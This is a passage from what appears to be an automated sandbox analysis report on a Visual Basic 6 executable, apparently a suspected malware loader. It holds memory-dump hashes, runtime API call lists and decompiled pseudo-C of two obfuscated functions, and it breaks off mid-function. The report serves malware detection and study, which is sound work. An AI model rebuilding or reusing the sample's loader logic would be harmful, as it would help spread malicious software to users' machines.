          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: be60accce07a12478fcc9ddebc2cf54dd90aa88b4fa04a720f4919e6884ecbe7
          • Instruction ID: 6f52073e5588ca89cd13989f5a53116ca1e74ef892b612caf3bd210f63c2b04e
          • Opcode Fuzzy Hash: be60accce07a12478fcc9ddebc2cf54dd90aa88b4fa04a720f4919e6884ecbe7
          • Instruction Fuzzy Hash: 8101F73A5120A20FC35D6AAC98211DF6B45B756389F17A32ADC4A9B342E1114E8947C6
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2b1aaba46b82e7dde035ca5b79994e045e91f9e9c610fe1c7c1b75310daa31cf
          • Instruction ID: 7752b376072af4f1d73aac8870fdbdf51f91991400ca5556fafc5aad8af51ac8
          • Opcode Fuzzy Hash: 2b1aaba46b82e7dde035ca5b79994e045e91f9e9c610fe1c7c1b75310daa31cf
          • Instruction Fuzzy Hash: BC11B271509304DFD7A8AE35C812ABFB7E2EFA8300F96442DDCCA8A554D7304A81CB47
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9dfe0524c4fe6da732360730a1ddf5ccef29bb09cf8f742e51c8dbca8d3b32d7
          • Instruction ID: 7ea49f804c7975887bb468855b7cb8c635c198a2b0b3c1510018d6abd6a97045
          • Opcode Fuzzy Hash: 9dfe0524c4fe6da732360730a1ddf5ccef29bb09cf8f742e51c8dbca8d3b32d7
          • Instruction Fuzzy Hash: C8018C71304244DFCB34CF18C9C4ADA73A6BF5A711F40012AEC098B3A6C334AD02CB0A
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: eb5a284d913f857b997ff7f9ad2b42cc15d07cd639d85dfd6cb87da29d1818d2
          • Instruction ID: e1254450744534ffe6255ca09c18225231dc66a258bf9b7730db9817eb55af42
          • Opcode Fuzzy Hash: eb5a284d913f857b997ff7f9ad2b42cc15d07cd639d85dfd6cb87da29d1818d2
          • Instruction Fuzzy Hash: 4EC02B5BD28026240691347F37441DE4C0292C3E523028F7F7808A394FFC45CE49044A
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1983be40eaf3e324ee9700356841e951f3c73799d86dfd79c3317d321aefb8ca
          • Instruction ID: b4cf9d7a93a10f04ed77efb89053a12732d0a4e5e1be50b4a24bc5e4e8ddecdb
          • Opcode Fuzzy Hash: 1983be40eaf3e324ee9700356841e951f3c73799d86dfd79c3317d321aefb8ca
          • Instruction Fuzzy Hash: 3BB092B33815808FEF02CF08C591B8073A0FB11A88B0804D0E042CB612C224E900CA04
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bfd6bfd9c4c013ad135fe02dd07c9f55146ab60886644274d1ec0ec188ed0a84
          • Instruction ID: 74d3cb2ff3ee8406bfe8ba8363eac96568f3d5643ff51b2a858936f2b59cea93
          • Opcode Fuzzy Hash: bfd6bfd9c4c013ad135fe02dd07c9f55146ab60886644274d1ec0ec188ed0a84
          • Instruction Fuzzy Hash: 52B09238311B408FC251CE19C180F8073A0FB04B60B810680E82187BA1C368E9008900
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 65%
          			E0041B1A7(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v20;
          				void* _v32;
          				void* _v36;
          				long long _v44;
          				void* _v48;
          				void* _v52;
          				intOrPtr _v64;
          				char _v76;
          				void* _v84;
          				signed int _v88;
          				char _v92;
          				long long _v100;
          				char _v108;
          				intOrPtr _v116;
          				char _v124;
          				intOrPtr _v132;
          				char _v140;
          				intOrPtr _v148;
          				signed int _v156;
          				signed int _v164;
          				char _v172;
          				char _v192;
          				signed int _v196;
          				signed int _v200;
          				intOrPtr* _v204;
          				signed int _v208;
          				char _v224;
          				signed int _v228;
          				intOrPtr* _v232;
          				signed int _v236;
          				signed int _v240;
          				signed int _v244;
          				signed int _v248;
          				signed int _v252;
          				signed int _v256;
          				signed int _v260;
          				signed int _v264;
          				signed int _v268;
          				signed int _v272;
          				signed int _v276;
          				signed int _v280;
          				signed int _v284;
          				intOrPtr* _v288;
          				signed int _v292;
          				signed int _v296;
          				signed int _t224;
          				signed int _t231;
          				char* _t236;
          				signed int _t242;
          				signed int _t247;
          				char _t248;
          				signed int _t256;
          				signed int _t261;
          				void* _t335;
          				intOrPtr _t336;
          				long long* _t337;
          				long long _t343;
          
          				_t336 = _t335 - 0x10;
          				_push(0x4011c6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t336;
          				L004011C0();
          				_v20 = _t336;
          				_v16 = 0x4011b0;
          				_v12 = 0;
          				_v8 = 0;
          				_push(0x11);
          				_push(0x403004);
          				_push( &_v76);
          				L004012AA();
          				_v100 =  *0x4011a8;
          				_v108 = 5;
          				_push(0);
          				_push( &_v108);
          				_push( &_v124);
          				L0040126E();
          				_v164 = 1;
          				_v172 = 0x8002;
          				_push( &_v124);
          				_t224 =  &_v172;
          				_push(_t224);
          				L004012E0();
          				_v196 = _t224;
          				_push( &_v124);
          				_push( &_v108);
          				_push(2);
          				L004012EC();
          				_t337 = _t336 + 0xc;
          				if(_v196 == 0) {
          					_v148 = 0x402fe0;
          					_v156 = 8;
          					L004012D4();
          					_push(1);
          					_push( &_v108);
          					_push( &_v124);
          					L00401256();
          					_v164 = 0x402fec;
          					_v172 = 0x8008;
          					_push( &_v124);
          					_t231 =  &_v172;
          					_push(_t231);
          					L004012E0();
          					_v196 = _t231;
          					_push( &_v124);
          					_push( &_v108);
          					_push(2);
          					L004012EC();
          					if(_v196 != 0) {
          						if( *0x41c614 != 0) {
          							_v232 = 0x41c614;
          						} else {
          							_push(0x41c614);
          							_push(0x402e90);
          							L00401304();
          							_v232 = 0x41c614;
          						}
          						_v196 =  *_v232;
          						_t242 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v92);
          						asm("fclex");
          						_v200 = _t242;
          						if(_v200 >= 0) {
          							_v236 = _v236 & 0x00000000;
          						} else {
          							_push(0x14);
          							_push(0x402e80);
          							_push(_v196);
          							_push(_v200);
          							L00401352();
          							_v236 = _t242;
          						}
          						_v204 = _v92;
          						_t247 =  *((intOrPtr*)( *_v204 + 0x58))(_v204,  &_v88);
          						asm("fclex");
          						_v208 = _t247;
          						if(_v208 >= 0) {
          							_v240 = _v240 & 0x00000000;
          						} else {
          							_push(0x58);
          							_push(0x402ea0);
          							_push(_v204);
          							_push(_v208);
          							L00401352();
          							_v240 = _t247;
          						}
          						_t248 = _v88;
          						_v224 = _t248;
          						_v88 = _v88 & 0x00000000;
          						L00401322();
          						L0040132E();
          						_v196 = _v196 & 0x00000000;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v244 = _t248;
          						} else {
          							_v244 = _v244 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 1;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v248 = _t248;
          						} else {
          							_v248 = _v248 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 2;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v252 = _t248;
          						} else {
          							_v252 = _v252 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 3;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v256 = _t248;
          						} else {
          							_v256 = _v256 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 4;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v260 = _t248;
          						} else {
          							_v260 = _v260 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 5;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v264 = _t248;
          						} else {
          							_v264 = _v264 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 6;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v268 = _t248;
          						} else {
          							_v268 = _v268 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 7;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v272 = _t248;
          						} else {
          							_v272 = _v272 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 8;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v276 = _t248;
          						} else {
          							_v276 = _v276 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 9;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v280 = _t248;
          						} else {
          							_v280 = _v280 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 0xa;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v284 = _t248;
          						} else {
          							_v284 = _v284 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_push(L"1:1:1");
          						_push( &_v108);
          						L00401316();
          						_push( &_v108);
          						L0040131C();
          						L00401322();
          						L00401334();
          						if( *0x41c614 != 0) {
          							_v288 = 0x41c614;
          						} else {
          							_push(0x41c614);
          							_push(0x402e90);
          							L00401304();
          							_v288 = 0x41c614;
          						}
          						_v196 =  *_v288;
          						_t256 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v92);
          						asm("fclex");
          						_v200 = _t256;
          						if(_v200 >= 0) {
          							_v292 = _v292 & 0x00000000;
          						} else {
          							_push(0x14);
          							_push(0x402e80);
          							_push(_v196);
          							_push(_v200);
          							L00401352();
          							_v292 = _t256;
          						}
          						_v204 = _v92;
          						_t261 =  *((intOrPtr*)( *_v204 + 0x110))(_v204,  &_v88);
          						asm("fclex");
          						_v208 = _t261;
          						if(_v208 >= 0) {
          							_v296 = _v296 & 0x00000000;
          						} else {
          							_push(0x110);
          							_push(0x402ea0);
          							_push(_v204);
          							_push(_v208);
          							L00401352();
          							_v296 = _t261;
          						}
          						_v228 = _v88;
          						_v88 = _v88 & 0x00000000;
          						L00401322();
          						L0040132E();
          						L00401250();
          					}
          				} else {
          					_push(0);
          					L00401268();
          					_v132 = 0x80020004;
          					_v140 = 0xa;
          					_v116 = 0x80020004;
          					_v124 = 0xa;
          					_v100 = 0x80020004;
          					_v108 = 0xa;
          					_push( &_v140);
          					_push( &_v124);
          					_push( &_v108);
          					_t343 =  *0x401150;
          					 *_t337 = _t343;
          					asm("fld1");
          					 *_t337 = _t343;
          					asm("fld1");
          					 *_t337 = _t343;
          					L004012F2();
          					_v44 = _t343;
          					_push( &_v140);
          					_push( &_v124);
          					_push( &_v108);
          					_push(3);
          					L004012EC();
          					_v100 = 2;
          					_v108 = 2;
          					_push( &_v108);
          					_push( &_v124);
          					L00401262();
          					_push( &_v124);
          					L0040131C();
          					L00401322();
          					_push( &_v124);
          					_push( &_v108);
          					_push(2);
          					L004012EC();
          					_v100 = 1;
          					_v108 = 2;
          					_push(0xfffffffe);
          					_push(0xfffffffe);
          					_push(0xfffffffe);
          					_push(0xffffffff);
          					_push( &_v108);
          					L0040125C();
          					L00401322();
          					L00401334();
          				}
          				asm("wait");
          				_push(0x41b900);
          				L00401310();
          				L00401310();
          				L00401310();
          				L00401310();
          				_v192 =  &_v76;
          				_t236 =  &_v192;
          				_push(_t236);
          				_push(0);
          				L00401274();
          				L00401310();
          				return _t236;
          			}

          0x0041b1aa
          0x0041b1ad
          0x0041b1b8
          0x0041b1b9
          0x0041b1c5
          0x0041b1cd
          0x0041b1d0
          0x0041b1d7
          0x0041b1de
          0x0041b1e5
          0x0041b1e7
          0x0041b1ef
          0x0041b1f0
          0x0041b1fb
          0x0041b1fe
          0x0041b205
          0x0041b20a
          0x0041b20e
          0x0041b20f
          0x0041b214
          0x0041b21e
          0x0041b22b
          0x0041b22c
          0x0041b232
          0x0041b233
          0x0041b238
          0x0041b242
          0x0041b246
          0x0041b247
          0x0041b249
          0x0041b24e
          0x0041b25a
          0x0041b353
          0x0041b35d
          0x0041b370
          0x0041b375
          0x0041b37a
          0x0041b37e
          0x0041b37f
          0x0041b384
          0x0041b38e
          0x0041b39b
          0x0041b39c
          0x0041b3a2
          0x0041b3a3
          0x0041b3a8
          0x0041b3b2
          0x0041b3b6
          0x0041b3b7
          0x0041b3b9
          0x0041b3ca
          0x0041b3d7
          0x0041b3f4
          0x0041b3d9
          0x0041b3d9
          0x0041b3de
          0x0041b3e3
          0x0041b3e8
          0x0041b3e8
          0x0041b406
          0x0041b41e
          0x0041b421
          0x0041b423
          0x0041b430
          0x0041b452
          0x0041b432
          0x0041b432
          0x0041b434
          0x0041b439
          0x0041b43f
          0x0041b445
          0x0041b44a
          0x0041b44a
          0x0041b45c
          0x0041b474
          0x0041b477
          0x0041b479
          0x0041b486
          0x0041b4a8
          0x0041b488
          0x0041b488
          0x0041b48a
          0x0041b48f
          0x0041b495
          0x0041b49b
          0x0041b4a0
          0x0041b4a0
          0x0041b4af
          0x0041b4b2
          0x0041b4b8
          0x0041b4c5
          0x0041b4cd
          0x0041b4d2
          0x0041b4e0
          0x0041b4eb
          0x0041b4f0
          0x0041b4e2
          0x0041b4e2
          0x0041b4e2
          0x0041b4fa
          0x0041b508
          0x0041b50a
          0x0041b51b
          0x0041b526
          0x0041b52b
          0x0041b51d
          0x0041b51d
          0x0041b51d
          0x0041b535
          0x0041b543
          0x0041b545
          0x0041b556
          0x0041b561
          0x0041b566
          0x0041b558
          0x0041b558
          0x0041b558
          0x0041b570
          0x0041b57e
          0x0041b580
          0x0041b591
          0x0041b59c
          0x0041b5a1
          0x0041b593
          0x0041b593
          0x0041b593
          0x0041b5ab
          0x0041b5b9
          0x0041b5bb
          0x0041b5cc
          0x0041b5d7
          0x0041b5dc
          0x0041b5ce
          0x0041b5ce
          0x0041b5ce
          0x0041b5e6
          0x0041b5f4
          0x0041b5f6
          0x0041b607
          0x0041b612
          0x0041b617
          0x0041b609
          0x0041b609
          0x0041b609
          0x0041b621
          0x0041b62f
          0x0041b631
          0x0041b642
          0x0041b64d
          0x0041b652
          0x0041b644
          0x0041b644
          0x0041b644
          0x0041b65c
          0x0041b66a
          0x0041b66c
          0x0041b67d
          0x0041b688
          0x0041b68d
          0x0041b67f
          0x0041b67f
          0x0041b67f
          0x0041b697
          0x0041b6a5
          0x0041b6a7
          0x0041b6b8
          0x0041b6c3
          0x0041b6c8
          0x0041b6ba
          0x0041b6ba
          0x0041b6ba
          0x0041b6d2
          0x0041b6e0
          0x0041b6e2
          0x0041b6f3
          0x0041b6fe
          0x0041b703
          0x0041b6f5
          0x0041b6f5
          0x0041b6f5
          0x0041b70d
          0x0041b71b
          0x0041b71d
          0x0041b72e
          0x0041b739
          0x0041b73e
          0x0041b730
          0x0041b730
          0x0041b730
          0x0041b748
          0x0041b756
          0x0041b758
          0x0041b760
          0x0041b761
          0x0041b769
          0x0041b76a
          0x0041b774
          0x0041b77c
          0x0041b788
          0x0041b7a5
          0x0041b78a
          0x0041b78a
          0x0041b78f
          0x0041b794
          0x0041b799
          0x0041b799
          0x0041b7b7
          0x0041b7cf
          0x0041b7d2
          0x0041b7d4
          0x0041b7e1
          0x0041b803
          0x0041b7e3
          0x0041b7e3
          0x0041b7e5
          0x0041b7ea
          0x0041b7f0
          0x0041b7f6
          0x0041b7fb
          0x0041b7fb
          0x0041b80d
          0x0041b825
          0x0041b82b
          0x0041b82d
          0x0041b83a
          0x0041b85f
          0x0041b83c
          0x0041b83c
          0x0041b841
          0x0041b846
          0x0041b84c
          0x0041b852
          0x0041b857
          0x0041b857
          0x0041b869
          0x0041b86f
          0x0041b87c
          0x0041b884
          0x0041b889
          0x0041b889
          0x0041b260
          0x0041b260
          0x0041b262
          0x0041b267
          0x0041b26e
          0x0041b278
          0x0041b27f
          0x0041b286
          0x0041b28d
          0x0041b29a
          0x0041b29e
          0x0041b2a2
          0x0041b2a3
          0x0041b2ab
          0x0041b2ae
          0x0041b2b2
          0x0041b2b5
          0x0041b2b9
          0x0041b2bc
          0x0041b2c1
          0x0041b2ca
          0x0041b2ce
          0x0041b2d2
          0x0041b2d3
          0x0041b2d5
          0x0041b2dd
          0x0041b2e4
          0x0041b2ee
          0x0041b2f2
          0x0041b2f3
          0x0041b2fb
          0x0041b2fc
          0x0041b306
          0x0041b30e
          0x0041b312
          0x0041b313
          0x0041b315
          0x0041b31d
          0x0041b324
          0x0041b32b
          0x0041b32d
          0x0041b32f
          0x0041b331
          0x0041b336
          0x0041b337
          0x0041b341
          0x0041b349
          0x0041b349
          0x0041b88e
          0x0041b88f
          0x0041b8c3
          0x0041b8cb
          0x0041b8d3
          0x0041b8db
          0x0041b8e3
          0x0041b8e9
          0x0041b8ef
          0x0041b8f0
          0x0041b8f2
          0x0041b8fa
          0x0041b8ff

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0041B1C5
          • __vbaAryConstruct2.MSVBVM60(?,00403004,00000011,?,?,?,?,004011C6), ref: 0041B1F0
          • #714.MSVBVM60(?,00000005,00000000), ref: 0041B20F
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B233
          • __vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008002,?), ref: 0041B249
          • __vbaOnError.MSVBVM60(00000000,?,?,004011C6), ref: 0041B262
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041B2BC
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041B2D5
          • #613.MSVBVM60(?,00000002), ref: 0041B2F3
          • __vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0041B2FC
          • __vbaStrMove.MSVBVM60(?,?,00000002), ref: 0041B306
          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002), ref: 0041B315
          • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B337
          • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B341
          • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B349
          • __vbaVarDup.MSVBVM60 ref: 0041B370
          • #617.MSVBVM60(?,?,00000001), ref: 0041B37F
          • __vbaVarTstNe.MSVBVM60(?,?,?,?,00000001), ref: 0041B3A3
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00000001), ref: 0041B3B9
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,?,?,004011C6), ref: 0041B3E3
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 0041B445
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 0041B49B
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000058), ref: 0041B4C5
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 0041B4CD
          • __vbaUI1I2.MSVBVM60 ref: 0041B4FA
          • __vbaUI1I2.MSVBVM60 ref: 0041B535
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8C3
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8CB
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8D3
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8DB
          • __vbaAryDestruct.MSVBVM60(00000000,?,0041B900,?,?,?,?,?,004011C6), ref: 0041B8F2
          • __vbaFreeStr.MSVBVM60(00000000,?,0041B900,?,?,?,?,?,004011C6), ref: 0041B8FA
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp
          Similarity
          • API ID: __vba$Free$ListMove$CheckHresult$#613#617#680#703#714ChkstkConstruct2DestructErrorNew2
          • String ID: 1:1:1
          • API String ID: 2873038774-2485858058
          • Opcode ID: 66dd338439de34cfae36b4178170927f18a39933c0f6eff369bb79a183c35876
          • Instruction ID: e78a9780489566d8537aef7e99f7065ec86bd70d04367550f7be771363a59215
          • Opcode Fuzzy Hash: 66dd338439de34cfae36b4178170927f18a39933c0f6eff369bb79a183c35876
          • Instruction Fuzzy Hash: FA12D871801218DAEB24EB95CC45BEDB7B4FF15308F1046EEE509B72A1DB781A88CF59
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 52%
          			E00419A92(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				long long _v32;
          				intOrPtr _v36;
          				void* _v52;
          				void* _v56;
          				short _v60;
          				void* _v64;
          				short _v68;
          				signed int _v72;
          				char _v76;
          				intOrPtr _v84;
          				char _v92;
          				char _v100;
          				char _v108;
          				char _v116;
          				char _v124;
          				intOrPtr _v132;
          				intOrPtr _v140;
          				intOrPtr _v148;
          				char _v156;
          				void* _v176;
          				signed int _v180;
          				signed int _v184;
          				void* _v188;
          				signed int _v192;
          				signed int _v204;
          				signed int _v208;
          				signed int _v212;
          				intOrPtr* _v216;
          				signed int _v220;
          				signed int _v224;
          				intOrPtr* _v228;
          				signed int _v232;
          				signed int _v236;
          				intOrPtr* _v240;
          				signed int _v244;
          				signed int _v248;
          				intOrPtr* _v252;
          				signed int _v256;
          				signed int _v260;
          				intOrPtr* _v264;
          				signed int _v268;
          				signed int _v272;
          				signed long long _v276;
          				signed int _v280;
          				signed int _t229;
          				signed int _t231;
          				signed int _t234;
          				char* _t235;
          				signed int _t241;
          				signed int _t245;
          				signed int _t251;
          				signed int _t256;
          				signed int _t263;
          				signed int _t268;
          				signed int _t275;
          				signed int _t280;
          				signed int _t284;
          				signed int _t290;
          				signed int _t295;
          				char* _t317;
          				void* _t327;
          				void* _t329;
          				intOrPtr _t330;
          				intOrPtr* _t331;
          				long long _t355;
          
          				_t330 = _t329 - 0xc;
          				 *[fs:0x0] = _t330;
          				L004011C0();
          				_v16 = _t330;
          				_v12 = 0x401188;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, _t327);
          				_v132 = 0x402eb4;
          				_v140 = 8;
          				L004012D4();
          				_push( &_v108);
          				_t229 =  &_v92;
          				_push(_t229);
          				L004012DA();
          				_v180 = _t229;
          				if(_v180 >= 0) {
          					_v212 = _v212 & 0x00000000;
          				} else {
          					_push(_v180);
          					L004012CE();
          					_v212 = _t229;
          				}
          				_v148 = 2;
          				_v156 = 0x8002;
          				_push( &_v108);
          				_t231 =  &_v156;
          				_push(_t231);
          				L004012E0();
          				_v184 = _t231;
          				_push( &_v108);
          				_push( &_v92);
          				_push(2);
          				L004012EC();
          				_t331 = _t330 + 0xc;
          				_t234 = _v184;
          				if(_t234 != 0) {
          					L004012C8();
          					if( *0x41c614 != 0) {
          						_v216 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v216 = 0x41c614;
          					}
          					_v180 =  *_v216;
          					_t290 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t290;
          					if(_v184 >= 0) {
          						_v220 = _v220 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v220 = _t290;
          					}
          					_v188 = _v76;
          					_t295 =  *((intOrPtr*)( *_v188 + 0x58))(_v188,  &_v72);
          					asm("fclex");
          					_v192 = _t295;
          					if(_v192 >= 0) {
          						_v224 = _v224 & 0x00000000;
          					} else {
          						_push(0x58);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v224 = _t295;
          					}
          					_v204 = _v72;
          					_v72 = _v72 & 0x00000000;
          					L00401322();
          					_t317 =  &_v76;
          					L0040132E();
          					_v116 = 0x80020004;
          					_v124 = 0xa;
          					_v100 = 0x80020004;
          					_v108 = 0xa;
          					_v84 = 0x80020004;
          					_v92 = 0xa;
          					_push( &_v124);
          					_push( &_v108);
          					_push( &_v92);
          					_t355 =  *0x401150;
          					_push(_t317);
          					_push(_t317);
          					_v92 = _t355;
          					asm("fld1");
          					_push(_t317);
          					_push(_t317);
          					_v100 = _t355;
          					asm("fld1");
          					_push(_t317);
          					_push(_t317);
          					_v108 = _t355;
          					L004012F2();
          					_v32 = _t355;
          					_push( &_v124);
          					_push( &_v108);
          					_push( &_v92);
          					_push(3);
          					L004012EC();
          					_t331 = _t331 + 0x10;
          					L004012C8();
          					_push(0);
          					_push(L"Feverroot3");
          					_push( &_v92);
          					L0040133A();
          					_t234 = 0x10;
          					L004011C0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push(_v36);
          					L004012C2();
          					L00401334();
          				}
          				_push(2);
          				_push("ABC");
          				_push(0x402ee4);
          				_push(0);
          				L004012BC();
          				if(_t234 != 5) {
          					if( *0x41c614 != 0) {
          						_v228 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v228 = 0x41c614;
          					}
          					_v180 =  *_v228;
          					_t241 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t241;
          					if(_v184 >= 0) {
          						_v232 = _v232 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v232 = _t241;
          					}
          					_v188 = _v76;
          					_t245 =  *((intOrPtr*)( *_v188 + 0x138))(_v188, L"Morwong4", 1);
          					asm("fclex");
          					_v192 = _t245;
          					if(_v192 >= 0) {
          						_v236 = _v236 & 0x00000000;
          					} else {
          						_push(0x138);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v236 = _t245;
          					}
          					L0040132E();
          					if( *0x41c614 != 0) {
          						_v240 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v240 = 0x41c614;
          					}
          					_v180 =  *_v240;
          					_t251 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t251;
          					if(_v184 >= 0) {
          						_v244 = _v244 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v244 = _t251;
          					}
          					_v188 = _v76;
          					_t256 =  *((intOrPtr*)( *_v188 + 0x130))(_v188,  &_v72);
          					asm("fclex");
          					_v192 = _t256;
          					if(_v192 >= 0) {
          						_v248 = _v248 & 0x00000000;
          					} else {
          						_push(0x130);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v248 = _t256;
          					}
          					_v208 = _v72;
          					_v72 = _v72 & 0x00000000;
          					L00401322();
          					L0040132E();
          					if( *0x41c614 != 0) {
          						_v252 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v252 = 0x41c614;
          					}
          					_v180 =  *_v252;
          					_t263 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t263;
          					if(_v184 >= 0) {
          						_v256 = _v256 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v256 = _t263;
          					}
          					_v188 = _v76;
          					_t268 =  *((intOrPtr*)( *_v188 + 0xc0))(_v188,  &_v176);
          					asm("fclex");
          					_v192 = _t268;
          					if(_v192 >= 0) {
          						_v260 = _v260 & 0x00000000;
          					} else {
          						_push(0xc0);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v260 = _t268;
          					}
          					_v68 = _v176;
          					L0040132E();
          					if( *0x41c614 != 0) {
          						_v264 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
